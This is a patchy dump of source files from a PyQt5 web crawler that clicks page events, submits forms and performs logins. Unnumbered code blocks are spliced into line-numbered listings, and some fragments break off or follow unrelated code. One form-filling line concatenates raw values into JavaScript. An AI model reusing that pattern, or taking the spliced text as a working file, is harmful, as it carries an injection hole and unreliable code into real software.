        """Order-independent cache key for the page pair (x, y)."""
        smaller, larger = sorted((x, y))
        return str(smaller) + "$" + str(larger)

    def calculate_cluster_per_visited_urls(self, url_hash):
        """Ratio of clusters to visited URLs for *url_hash*; 1.0 when nothing was visited."""
        try:
            return self.num_of_clusters(url_hash) / self.num_of_visited_urls(url_hash)
        except ZeroDivisionError:
            return 1.0

    def num_of_clusters(self, url_hash):
        """Number of stored clusters for *url_hash* (1.0 when none are stored yet)."""
        clusters = self._persistence_manager.get_clusters(url_hash)
        if clusters is not None:
            return len(clusters)
        return 1.0

    def num_of_visited_urls(self, url_hash):
        """Number of visited URLs recorded for *url_hash*."""
        return self._persistence_manager.count_visited_url_per_hash(url_hash)

    def need_more_urls_of_this_type(self, url_hash):
        """
        :param url_hash:
        :return: if we have seen enough of an url or not
        """
        return self.calculate_cluster_per_visited_urls(url_hash) > CLUSTER_THRESHOLD
See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | import random 20 | import string 21 | from enum import Enum 22 | 23 | from PyQt5.Qt import QUrl 24 | from PyQt5.QtWebKitWidgets import QWebPage 25 | from analyzer.helper.formhelper import extract_forms 26 | from analyzer.helper.linkhelper import extract_links 27 | 28 | from analyzer.helper.propertyhelper import property_helper 29 | from models.ajaxrequest import AjaxRequest 30 | from models.deltapage import DeltaPage 31 | from models.enumerations import XHRBehavior 32 | from models.keyclickable import KeyClickable 33 | from core.interactioncore import InteractionCore 34 | from models.utils import CrawlSpeed, purge_dublicates 35 | 36 | 37 | class EventExecutor(InteractionCore): 38 | 39 | def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None): 40 | super(EventExecutor, self).__init__(parent, proxy, port, crawl_speed, network_access_manager) 41 | self._url_changed = False # Inidicates if a event changes a location => treat it as link! 42 | self._new_url = None 43 | self.timeming_events = None 44 | self.none_key_events = ['click', 'focus', 'blur', 'dblclick', 'input', 'change', 45 | 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 46 | 'resize', 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave'] 47 | self.key_events = ['keyup', 'keydown', 'keypress'] 48 | self.supported_events = self.none_key_events + self.key_events 49 | 50 | self.seen_timeouts = {} 51 | self.popup = None # reference if a popup occurs... 
52 | self.mainFrame().urlChanged.connect(self._url_changes) 53 | 54 | def execute(self, webpage, timeout=5, element_to_click=None, xhr_options=XHRBehavior.ObserveXHR, pre_clicks=[]): 55 | logging.debug( 56 | "EventExecutor test started on {}...".format(webpage.url) + " with " + element_to_click.toString()) 57 | self._analyzing_finished = False 58 | self._loading_complete = False 59 | self.xhr_options = xhr_options 60 | self.element_to_click = None 61 | self.ajax_requests = [] 62 | self._new_url = None 63 | self.timeming_events = None 64 | self._capturing_ajax = False 65 | self._new_clickables = [] 66 | self.element_to_click = element_to_click 67 | self.popup = None 68 | self.mainFrame().setHtml(webpage.html, QUrl(webpage.url)) 69 | target_tag = element_to_click.dom_address.split("/") 70 | target_tag = target_tag[-1] 71 | if target_tag in ['video']: 72 | return EventResult.UnsupportedTag, None 73 | 74 | t = 0.0 75 | while (not self._loading_complete and t < timeout ): # Waiting for finish processing 76 | self._wait(0.1) 77 | t += 0.1 78 | if not self._loading_complete: 79 | logging.debug("Timeout occurs while initial page loading...") 80 | return EventResult.ErrorWhileInitialLoading, None 81 | # Prepare Page for clicking... 
82 | self._wait(0.1) 83 | for click in pre_clicks: 84 | pre_click_elem = None 85 | logging.debug("Click on: " + click.toString()) 86 | if click.id != None and click.id != "": 87 | pre_click_elem = self.search_element_with_id(click.id) 88 | if click.html_class != None and pre_click_elem == None: 89 | pre_click_elem = self.search_element_with_class(click.html_class, click.dom_address) 90 | if pre_click_elem == None: 91 | pre_click_elem = self.search_element_without_id_and_class(click.dom_address) 92 | 93 | if pre_click_elem is None: 94 | logging.debug("Preclicking element not found") 95 | return EventResult.PreviousClickNotFound, None 96 | 97 | if "javascript:" not in click.event: 98 | js_code = click.event 99 | if js_code[0:2] == "on": 100 | js_code = js_code[2:] # if event beginns with on, escape it 101 | js_code = "Simulate." + js_code + "(this);" 102 | pre_click_elem.evaluateJavaScript(js_code) # Waiting for finish processing 103 | else: 104 | pre_click_elem.evaluateJavaScript(click.event[len("javascript:"):]) 105 | self._wait(self.wait_for_event) 106 | 107 | is_key_event = False 108 | # Now execute the target event 109 | if "javascript:" not in element_to_click.event: 110 | self._url_changed = False 111 | js_code = element_to_click.event 112 | if js_code[0:2] == "on": 113 | js_code = js_code[2:] # if event begins with on, escape it 114 | 115 | if js_code in self.key_events: 116 | is_key_event = True 117 | random_char = random.choice(string.ascii_letters) 118 | js_code = "Simulate." + js_code + "(this, '" + random_char + "');" 119 | else: 120 | js_code = "Simulate." 
+ js_code + "(this);" 121 | else: 122 | js_code = element_to_click.event[len("javascript:"):] 123 | 124 | self.mainFrame().evaluateJavaScript( 125 | self._addEventListener) # This time it is here, because I dont want to have the initial addings 126 | 127 | real_clickable = None 128 | if element_to_click.id != None and element_to_click.id != "": 129 | real_clickable = self.search_element_with_id(element_to_click.id) 130 | if element_to_click.html_class != None and real_clickable == None: 131 | real_clickable = self.search_element_with_class(element_to_click.html_class, element_to_click.dom_address) 132 | if real_clickable == None: 133 | real_clickable = self.search_element_without_id_and_class(element_to_click.dom_address) 134 | 135 | if real_clickable is None: 136 | logging.debug("Target Clickable not found") 137 | return EventResult.TargetElementNotFound, None 138 | 139 | self._capturing_ajax = True 140 | real_clickable.evaluateJavaScript(js_code) 141 | self._wait(0.5) 142 | self._capturing_ajax = False 143 | links, clickables = extract_links(self.mainFrame(), webpage.url) 144 | 145 | forms = extract_forms(self.mainFrame()) 146 | elements_with_event_properties = property_helper(self.mainFrame()) 147 | self.mainFrame().evaluateJavaScript(self._property_obs_js) 148 | self._wait(0.1) 149 | 150 | html = self.mainFrame().toHtml() 151 | url = self.mainFrame().url().toString() 152 | 153 | if is_key_event: 154 | generator = KeyClickable(element_to_click, random_char) 155 | else: 156 | generator = element_to_click 157 | if self._url_changed and self._new_url.toString() != webpage.url: 158 | delta_page = DeltaPage(-1, self._new_url.toString(), html=None, generator=generator, parent_id=webpage.id, 159 | cookiesjar=webpage.cookiejar) 160 | self._analyzing_finished = True 161 | self.mainFrame().setHtml(None) 162 | return EventResult.URLChanged, delta_page 163 | elif self.popup is not None: 164 | logging.debug("Event creates Popup with Url: 
{}".format(self.popup.mainFrame().url().toString())) 165 | popup_url = self.popup.mainFrame().url().toString() 166 | delta_page = DeltaPage(-1, popup_url, html=None, generator=generator, parent_id=webpage.id) 167 | self.popup = None 168 | self._analyzing_finished = True 169 | self.mainFrame().setHtml(None) 170 | return EventResult.CreatesPopup, delta_page 171 | else: 172 | delta_page = DeltaPage(-1, webpage.url, html, generator=generator, parent_id=webpage.id, 173 | cookiesjar=webpage.cookiejar) 174 | delta_page.clickables = self._new_clickables # Set by add eventlistener code 175 | delta_page.clickables.extend(clickables) 176 | delta_page.clickables.extend(elements_with_event_properties) 177 | delta_page.clickables = purge_dublicates(delta_page.clickables) 178 | try: 179 | delta_page.clickables.remove(self.element_to_click) # remove the clickable self... 180 | except ValueError: 181 | pass 182 | delta_page.links = links 183 | delta_page.forms = forms 184 | delta_page.ajax_requests = self.ajax_requests 185 | self._analyzing_finished = True 186 | self.mainFrame().setHtml(None) 187 | return EventResult.Ok, delta_page 188 | 189 | def javaScriptAlert(self, frame, msg): 190 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 191 | 192 | def javaScriptConfirm(self, frame, msg): 193 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 194 | return True 195 | 196 | def loadFinishedHandler(self, result): 197 | if not self._analyzing_finished: # Just to ignoring setting of non page.... 
198 | self._loading_complete = True 199 | 200 | def jsWinObjClearedHandler(self): # Adding here the js-scripts corresponding to the phases 201 | if not self._analyzing_finished: 202 | self.mainFrame().evaluateJavaScript(self._lib_js) 203 | self.mainFrame().evaluateJavaScript(self._md5) 204 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge) 205 | if self.xhr_options == XHRBehavior.ObserveXHR: 206 | self.mainFrame().evaluateJavaScript(self._xhr_observe_js) 207 | if self.xhr_options == XHRBehavior.InterceptXHR: 208 | self.mainFrame().evaluateJavaScript(self._xhr_interception_js) 209 | 210 | def createWindow(self, win_type): 211 | logging.debug("Creating new window...{}".format(win_type)) 212 | 213 | def capturing_requests(self, request): 214 | if self._capturing_ajax: 215 | logging.debug("Ajax to: {} captured...".format(request['url'])) 216 | ajax_request = AjaxRequest(request['method'], request['url'], self.element_to_click, request['parameters']) 217 | if ajax_request not in self.ajax_requests: 218 | self.ajax_requests.append(ajax_request) 219 | 220 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 221 | logging.debug("Console(EventExecutor): " + message + " at: " + str(lineNumber)) 222 | pass 223 | 224 | def capture_timeout_call(self, timingevent): 225 | try: 226 | # logging.debug(timingevent) 227 | if timingevent['time'] != "undefined": 228 | time = timingevent['time'] # millisecond 229 | event_type = timingevent['type'] 230 | event_id = timingevent['function_id'] 231 | if self.timeming_events is not None: 232 | if time > self.timeming_events[0]: 233 | self.timeming_events = (time, event_type, event_id) 234 | else: 235 | self.timeming_events = (time, event_type, event_id) 236 | except KeyError as err: 237 | logging.debug("Key error occurred in Events " + str(err)) 238 | 239 | 240 | def _url_changes(self, url): 241 | self._url_changed = True 242 | self._new_url = url 243 | 244 | def createWindow(self, webWindowType): 245 
class EventResult(Enum):
    """Outcome of EventExecutor.execute() (also reused by FormHandler)."""
    Ok = 0  # event executed, delta page captured
    PreviousClickNotFound = 1  # an element from pre_clicks could not be located
    TargetElementNotFound = 2  # the target clickable/form element could not be located
    ErrorWhileInitialLoading = 3  # initial setHtml() load timed out
    URLChanged = 4  # the event navigated to a new URL (treated like a link)
    UnsupportedTag = 5  # target tag (e.g. <video>) is not supported
    CreatesPopup = 6  # the event opened a popup window
16 | ''' 17 | 18 | import logging 19 | 20 | from PyQt5.Qt import QUrl 21 | 22 | from core.interactioncore import InteractionCore 23 | from core.eventexecutor import EventResult 24 | from analyzer.helper.formhelper import extract_forms 25 | from analyzer.helper.linkhelper import extract_links 26 | from models.clickable import Clickable 27 | from models.utils import CrawlSpeed, purge_dublicates 28 | 29 | __author__ = 'constantin' 30 | 31 | 32 | class FormHandler(InteractionCore): 33 | 34 | 35 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None): 36 | super(FormHandler, self).__init__(parent, proxy, port, crawl_speed, network_access_manager) 37 | #self.mainFrame().urlChanged.connect(self._url_changes) 38 | 39 | def submit_form(self, form, webpage, data=dict(), timeout=5): 40 | logging.debug("FormHandler on Page: {} started...".format(webpage.url)) 41 | self._loading_complete = False 42 | self._analyzing_finished = False 43 | try: 44 | url = webpage.url.toString() 45 | except AttributeError: 46 | url = webpage.url 47 | self.mainFrame().setHtml(webpage.html, QUrl(url)) 48 | self._new_clickables = [] 49 | 50 | t = 0.0 51 | while not self._loading_complete and t < timeout: # Waiting for finish processing 52 | self._wait(0.1) 53 | t += 0.1 54 | if not self._loading_complete: 55 | logging.debug("Timeout occurs while initial page loading...") 56 | return EventResult.ErrorWhileInitialLoading, None 57 | 58 | target_form = None 59 | p_forms = self.mainFrame().findAllElements("form") 60 | for tmp_form in p_forms: 61 | path = tmp_form.evaluateJavaScript("getXPath(this)") 62 | if path == form.dom_address: 63 | target_form = tmp_form 64 | break 65 | if target_form is None: 66 | return EventResult.TargetElementNotFound, None 67 | 68 | for elem in form.parameter: #Iterate through abstract form representation 69 | if elem.name in data: #Check if we have the data we must set 70 | elem_found = False # Indicates if we found 
the element in the html 71 | value_to_set = data[elem.name] 72 | for tmp in target_form.findAll(elem.tag): #Locking in the target form, if we found the element we have to set 73 | if tmp.attribute("name") == elem.name: # Has the current element in the html the same name as our data 74 | tmp.evaluateJavaScript("this.value = '" + value_to_set + "';") 75 | elem_found = True 76 | break 77 | if not elem_found: 78 | return EventResult.TargetElementNotFound, None 79 | # Now we should have set all known parameters, next click the submit button 80 | q_submit_button = None 81 | if "submit" in form.toString(): 82 | inputs = target_form.findAll("input") + target_form.findAll("button") 83 | for el in inputs: 84 | if el.attribute("type") == "submit": 85 | q_submit_button = el 86 | break 87 | #q_submit_button.evaluateJavaScript("this.id='oxyfrymbel'") 88 | else: 89 | logging.debug(form.toString()) 90 | 91 | if q_submit_button is None: 92 | inputs = target_form.findAll("button") 93 | q_submit_button = None 94 | if len(inputs) > 1: 95 | logging.debug("Cannot locate login button...") 96 | return EventResult.TargetElementNotFound, None 97 | elif len(inputs) == 1: 98 | q_submit_button = inputs[0] 99 | 100 | method = target_form.attribute("onsubmit") 101 | if method is not None and method != "": 102 | js_code_snippets = method.split(";") 103 | for snippet in js_code_snippets: 104 | if "return" in snippet or snippet == "": 105 | logging.debug("Ignoring snippet: {}".format(snippet)) 106 | continue 107 | logging.debug("Eval: {}".format(snippet+";")) 108 | self.mainFrame().evaluateJavaScript(snippet+";") 109 | self._wait(3) 110 | self.mainFrame().evaluateJavaScript(self._addEventListener) 111 | self._wait(3) 112 | else: 113 | #TODO: Implement way for sending forms without onsubmit-method 114 | # check between: target_form.evaluateJavaScript("Simulate or document.?form?.submit()) 115 | # or submit_button click 116 | if q_submit_button is not None: 117 | logging.debug("Click on submit 
button...") 118 | q_submit_button.evaluateJavaScript("Simulate.click(this);") 119 | self._wait(3) 120 | else: 121 | logging.debug("Trigger submit event on form...") 122 | target_form.evaluateJavaScript("Simulate.submit(this);") 123 | self._wait(3) 124 | 125 | links, clickables = extract_links(self.mainFrame(), url) 126 | forms = extract_forms(self.mainFrame()) 127 | html = self.mainFrame().toHtml() 128 | #f = open("html.txt", "w") 129 | #f.write(html) 130 | #f.close() 131 | self.mainFrame().setHtml(None) 132 | self._new_clickables.extend(clickables) 133 | self._new_clickables = purge_dublicates(self._new_clickables) 134 | return EventResult.Ok, html, self._new_clickables, forms, links, [] 135 | 136 | def jsWinObjClearedHandler(self): #Adding here the js-scripts corresponding to the phases 137 | if not self._analyzing_finished: 138 | self.mainFrame().evaluateJavaScript(self._lib_js) 139 | self.mainFrame().evaluateJavaScript(self._md5) 140 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge) 141 | 142 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 143 | #logging.debug("Console(FormHandler): " + message + " at: " + str(lineNumber)) 144 | pass 145 | 146 | def javaScriptAlert(self, frame, msg): 147 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 148 | 149 | def javaScriptConfirm(self, frame, msg): 150 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 151 | return True 152 | 153 | def loadFinishedHandler(self, result): 154 | if not self._analyzing_finished: # Just to ignoring setting of non page.... 
155 | self._loading_complete = True 156 | -------------------------------------------------------------------------------- /crawler/core/interactioncore.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | from PyQt5.Qt import QWebPage, QWebSettings 20 | from PyQt5.QtNetwork import QNetworkProxy, QNetworkRequest 21 | from PyQt5.QtCore import QSize, QUrl, QByteArray 22 | 23 | from time import time, sleep 24 | from core.jsbridge import JsBridge 25 | from models.clickable import Clickable 26 | from models.utils import CrawlSpeed 27 | import logging 28 | 29 | class InteractionCore(QWebPage): 30 | ''' 31 | This is the main class for interacting with a webpage, here are all necessary js-files loaded, and signal connections build 32 | ''' 33 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None): 34 | QWebPage.__init__(self, parent) 35 | self.app = parent.app 36 | self._js_bridge = JsBridge(self) 37 | self.loadFinished.connect(self.loadFinishedHandler) 38 | self.mainFrame().javaScriptWindowObjectCleared.connect(self.jsWinObjClearedHandler) 39 | self.frameCreated.connect(self.frameCreatedHandler) 40 | self.setViewportSize(QSize(1024, 800)) 41 | 42 | if crawl_speed == CrawlSpeed.Slow: 43 | 
self.wait_for_processing = 1 44 | self.wait_for_event = 2 45 | if crawl_speed == CrawlSpeed.Medium: 46 | self.wait_for_processing = 0.3 47 | self.wait_for_event = 1 48 | if crawl_speed == CrawlSpeed.Fast: 49 | self.wait_for_processing = 0.1 50 | self.wait_for_event = 0.5 51 | if crawl_speed == CrawlSpeed.Speed_of_Lightning: 52 | self.wait_for_processing = 0.01 53 | self.wait_for_event = 0.1 54 | 55 | f = open("js/lib.js", "r") 56 | self._lib_js = f.read() 57 | f.close() 58 | 59 | f = open("js/ajax_observer.js") 60 | self._xhr_observe_js = f.read() 61 | f.close() 62 | 63 | f = open("js/timing_wrapper.js") 64 | self._timeming_wrapper_js = f.read() 65 | f.close() 66 | 67 | 68 | f = open("js/ajax_interceptor.js") 69 | self._xhr_interception_js = f.read() 70 | f.close() 71 | 72 | f = open("js/addeventlistener_wrapper.js") 73 | self._addEventListener = f.read() 74 | f.close() 75 | 76 | f = open("js/md5.js") 77 | self._md5 = f.read() 78 | f.close() 79 | 80 | f = open("js/property_obs.js") 81 | self._property_obs_js = f.read() 82 | f.close() 83 | 84 | enablePlugins = True 85 | loadImages = False 86 | self.settings().setAttribute(QWebSettings.PluginsEnabled, enablePlugins) 87 | self.settings().setAttribute(QWebSettings.JavaEnabled, enablePlugins) 88 | #self.settings().setAttribute(QWebSettings.AutoLoadImages, loadImages) 89 | self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True) 90 | self.settings().setAttribute(QWebSettings.JavascriptEnabled, True) 91 | self.settings().setAttribute(QWebSettings.JavascriptCanOpenWindows, True) 92 | 93 | if network_access_manager: 94 | self.setNetworkAccessManager(network_access_manager) 95 | 96 | if proxy != "" and port != 0: 97 | manager = self.networkAccessManager() 98 | p = QNetworkProxy(QNetworkProxy.HttpProxy, proxy, port, None, None) 99 | manager.setProxy(p) 100 | self.setNetworkAccessManager(manager) 101 | 102 | #Have to connect it here, otherwise I could connect it to the old one and then replaces it 103 | 
self.networkAccessManager().finished.connect(self.loadComplete) 104 | 105 | def analyze(self, html, requested_url, timeout = 20): 106 | raise NotImplemented() 107 | 108 | def userAgentForUrl(self, url): 109 | return "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 110 | 111 | def loadFinishedHandler(self, result): 112 | pass 113 | 114 | def frameCreatedHandler(self, frame): 115 | pass 116 | 117 | def jsWinObjClearedHandler(self): 118 | pass 119 | 120 | def javaScriptAlert(self, frame, msg): 121 | pass 122 | 123 | def javaScriptConfirm(self, frame, msg): 124 | return True 125 | 126 | def javaScriptPrompt(self, *args, **kwargs): 127 | return True 128 | 129 | def _wait(self, waiting_time=1): 130 | """Wait for delay time 131 | """ 132 | deadline = time() + waiting_time 133 | while time() < deadline: 134 | sleep(0) 135 | self.app.processEvents() 136 | 137 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 138 | #logging.debug("Console: " + message + " at: " + str(lineNumber)) 139 | pass 140 | 141 | def loadComplete(self, reply): 142 | pass 143 | 144 | def add_eventlistener_to_element(self, msg): 145 | #logging.debug(msg) 146 | if "id" in msg and msg['id'] != "": 147 | id = msg['id'] 148 | else: 149 | id = None 150 | dom_address = msg['addr'] 151 | event = msg['event'] 152 | if event == "": 153 | event = None 154 | tag = msg['tag'] 155 | if "class" in msg and msg['class'] != "": 156 | html_class = msg['class'] 157 | else: 158 | html_class = None 159 | function_id = msg['function_id'] 160 | if tag is not None and dom_address != "": 161 | tmp = Clickable(event, tag, dom_address, id, html_class, function_id=function_id) 162 | if tmp not in self._new_clickables: 163 | self._new_clickables.append(tmp) 164 | 165 | 166 | def search_element_with_id(self, element_id): 167 | elem = self.mainFrame().findAllElements("#" + str(element_id)) 168 | if len(elem) > 0: 169 | return elem[0] # maybe check if there is 
    def search_element_without_id_and_class(self, dom_adress):
        """Walk the DOM along *dom_adress* (an XPath-like "/HTML/BODY/DIV[2]"
        path) and return the matching QWebElement, or None if the walk fails.

        NOTE(review): tag comparison assumes QWebElement.tagName() returns
        upper-case names, which is why every path segment is upper-cased —
        confirm against the QtWebKit docs.
        """
        check_dom_adress = dom_adress  # kept for the final sanity check below
        dom_address = dom_adress.split("/")
        current_element_in_dom = self.mainFrame().documentElement() #Is HTML-Element
        while len(dom_address) > 0 and current_element_in_dom is not None:
            target_tag_name = dom_address.pop(0) # Get and remove the first element
            target_tag_name = target_tag_name.upper()
            if len(target_tag_name) == 0:
                continue
            elif target_tag_name == "HTML": #or target_tag_name == "body":
                continue
            else:
                tmp = target_tag_name.find("[")
                if tmp > 0: # target_tag_name looks like tagname[index]
                    target_tag_name = target_tag_name.split("[")
                    index = int(target_tag_name[1].split("]")[0]) # get index out of target_tag_name
                    target_tag_name = target_tag_name[0] # target_tag_name name
                    last_child = current_element_in_dom.lastChild()
                    tmp_element = current_element_in_dom.findFirst(target_tag_name) # takes first child
                    if tmp_element.tagName() == target_tag_name: # if first child already matches, one occurrence is consumed
                        index -= 1;
                    counter = 100 #Sometimes comparing with last child went wrong, therefore we have a backup counter
                    while index > 0 and tmp_element != last_child: # take next sibling until index reaches 0
                        tmp_element = tmp_element.nextSibling() #
                        if tmp_element.tagName() == target_tag_name:
                            index -= 1
                        counter -= 1
                        if counter == 0: #If the backup counter hits 0, give up — we won't find it anymore
                            current_element_in_dom = None
                            break
                    if index == 0 and tmp_element.tagName() == target_tag_name:
                        current_element_in_dom = tmp_element
                    else: #We missed the element
                        current_element_in_dom = None
                else: #target_tag_name has no [index] suffix: it is the only/first element of its type
                    tmp_element = current_element_in_dom.firstChild()
                    last_child = current_element_in_dom.lastChild()
                    counter = 100
                    while tmp_element.tagName() != target_tag_name and tmp_element != last_child and counter > 0:
                        #logging.debug(tmp_element.tagName())
                        counter -= 1
                        if tmp_element.tagName() == target_tag_name:
                            current_element_in_dom = tmp_element
                            break
                        else:
                            tmp_element = tmp_element.nextSibling()
                    if tmp_element.tagName() != target_tag_name or counter == 0:
                        current_element_in_dom = None
                    else:
                        current_element_in_dom = tmp_element

            # Reset the per-segment cursors before the next path component.
            tmp_element = None
            last_child = None
        dom_address = None

        if current_element_in_dom == None:
            return None
        # Final sanity check: the found element must reproduce the requested path.
        if current_element_in_dom.evaluateJavaScript("getXPath(this)") != check_dom_adress:
            logging.debug("Element not found: " + str(current_element_in_dom.evaluateJavaScript("getXPath(this)")) + " : " + str(check_dom_adress))
            return None
        else:
            return current_element_in_dom
post_params.remove(post_params.length() - 1, 1) 262 | return post_params -------------------------------------------------------------------------------- /crawler/core/jaekcore.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from asyncio.tasks import sleep 19 | import logging 20 | from PyQt5.Qt import QApplication, QObject 21 | from PyQt5.QtNetwork import QNetworkAccessManager 22 | import sys 23 | from copy import deepcopy 24 | from analyzer.mainanalyzer import MainAnalyzer 25 | from core.eventexecutor import EventResult, EventExecutor 26 | from core.formhandler import FormHandler 27 | from models.webpage import WebPage 28 | from utils.asyncrequesthandler import AsyncRequestHandler 29 | from utils.execptions import LoginFailed 30 | from utils.utils import count_cookies, calculate_similarity_between_pages 31 | 32 | __author__ = 'constantin' 33 | 34 | class JaekCore(QObject): 35 | 36 | 37 | def __init__(self, config, proxy="", port=0, database_manager=None): 38 | QObject.__init__(self) 39 | self.app = QApplication(sys.argv) 40 | self._network_access_manager = QNetworkAccessManager(self) 41 | self.user = None 42 | self.proxy = proxy 43 | self.port = port 44 | self.config = config 45 | self.database_manager = database_manager 46 | self.domain_handler = 
None 47 | self.process_with_login = False 48 | self.async_request_handler = AsyncRequestHandler(self.database_manager) 49 | 50 | self._event_executor = EventExecutor(self, proxy, port, crawl_speed=config.process_speed, 51 | network_access_manager=self._network_access_manager) 52 | self._dynamic_analyzer = MainAnalyzer(self, proxy, port, crawl_speed=config.process_speed, 53 | network_access_manager=self._network_access_manager) 54 | self._form_handler = FormHandler(self, proxy, port, crawl_speed=config.process_speed, 55 | network_access_manager=self._network_access_manager) 56 | 57 | self.cookie_num = -1 58 | self.interactive_login_form_search = False 59 | 60 | def _find_form_with_special_parameters(self, page, login_data, interactive_search=True): 61 | keys = list(login_data.keys()) 62 | data1 = keys[0] 63 | data2 = keys[1] 64 | for form in page.forms: 65 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1: 66 | return form, None 67 | if interactive_search: 68 | for clickable in page.clickables: 69 | tmp_page = deepcopy(page) 70 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable) 71 | if delta_page is None: 72 | sleep(2000) 73 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable) 74 | if delta_page is None: 75 | continue 76 | delta_page = self.domain_handler.complete_urls_in_page(delta_page) 77 | delta_page = self.domain_handler.analyze_urls(delta_page) 78 | if event_state == EventResult.Ok: 79 | for form in delta_page.forms: 80 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1: 81 | return form, clickable 82 | return None, None 83 | 84 | def _initial_login(self): 85 | logging.debug("Initial Login...") 86 | self._page_with_loginform_logged_out = self._get_webpage(self.user.url_with_login_form) 87 | num_of_cookies_before_login = count_cookies(self._network_access_manager, self.user.url_with_login_form) 88 | logging.debug("Number of 
cookies before initial login: {}".format(num_of_cookies_before_login)) 89 | self._login_form, login_clickables = self._find_form_with_special_parameters(self._page_with_loginform_logged_out, self.user.login_data) 90 | if self._login_form is None: 91 | f = open("No_login_form.txt", "w") 92 | f.write(self._page_with_loginform_logged_out.html) 93 | f.close() 94 | raise LoginFailed("Cannot find Login form, please check the parameters...") 95 | 96 | page_after_login = self._login_and_return_webpage(self._login_form, self._page_with_loginform_logged_out, self.user.login_data, login_clickables) 97 | if page_after_login is None: 98 | raise LoginFailed("Cannot load loginpage anymore...stop...") 99 | login_successfull = calculate_similarity_between_pages(self._page_with_loginform_logged_out, page_after_login) < 0.5 100 | if login_successfull: 101 | num_cookies_after_login = count_cookies(self._network_access_manager, self.user.url_with_login_form) 102 | if num_cookies_after_login > num_of_cookies_before_login: 103 | self.cookie_num = num_cookies_after_login 104 | logging.debug("Initial login successfull!") 105 | if login_clickables is not None: 106 | return True, True # If we login with a click 107 | else: 108 | return True, False # If we don't login with a click 109 | raise LoginFailed("Cannot login, sorry...") 110 | 111 | def _login_and_return_webpage(self, login_form, page_with_login_form=None, login_data=None, login_clickable= None): 112 | if page_with_login_form is None: 113 | page_with_login_form = self._page_with_loginform_logged_out 114 | try: 115 | if login_clickable is not None: 116 | tmp_page = deepcopy(page_with_login_form) 117 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable) 118 | if event_state == EventResult.ErrorWhileInitialLoading: 119 | sleep(2000) 120 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable) 121 | if event_state == 
EventResult.ErrorWhileInitialLoading: 122 | logging.debug("Two time executing fails.. stop crawling") 123 | return None 124 | self.domain_handler.complete_urls_in_page(page_with_login_form) 125 | self.domain_handler.analyze_urls(page_with_login_form) 126 | self.async_request_handler.handle_requests(page_with_login_form) 127 | logging.debug("Start submitting login form...") 128 | response_code, html_after_timeouts, new_clickables, forms, links, timemimg_requests = self._form_handler.submit_form(login_form, page_with_login_form, login_data) 129 | except ValueError: 130 | return None 131 | #TODO: Put building of Webpage inside submit function 132 | page_after_login = WebPage(-1, page_with_login_form.url, html_after_timeouts) 133 | page_after_login.clickables = new_clickables 134 | page_after_login.links = links 135 | page_after_login.timing_requests = timemimg_requests 136 | page_after_login.forms = forms 137 | self.domain_handler.complete_urls_in_page(page_after_login) 138 | self.domain_handler.analyze_urls(page_after_login) 139 | self.async_request_handler.handle_requests(page_after_login) 140 | return page_after_login 141 | 142 | def _handle_possible_logout(self): 143 | """ 144 | Handles a possible logout 145 | :return: True is we were not logged out and false if we were logged out 146 | """ 147 | retries = 0 148 | max_retries = 3 149 | while retries < max_retries: 150 | logging.debug("Start with relogin try number: {}".format(retries+1)) 151 | page_with_login_form = self._get_webpage(self.user.url_with_login_form) 152 | login_form, login_clickable = self._find_form_with_special_parameters(page_with_login_form, self.user.login_data, self.interactive_login_form_search) 153 | if login_form is not None: 154 | #So login_form is visible, we are logged out 155 | logging.debug("Logout detected, visible login form...") 156 | hopefully_reloggedin_page = self._login_and_return_webpage(login_form, page_with_login_form, self.user.login_data, login_clickable) 157 | if 
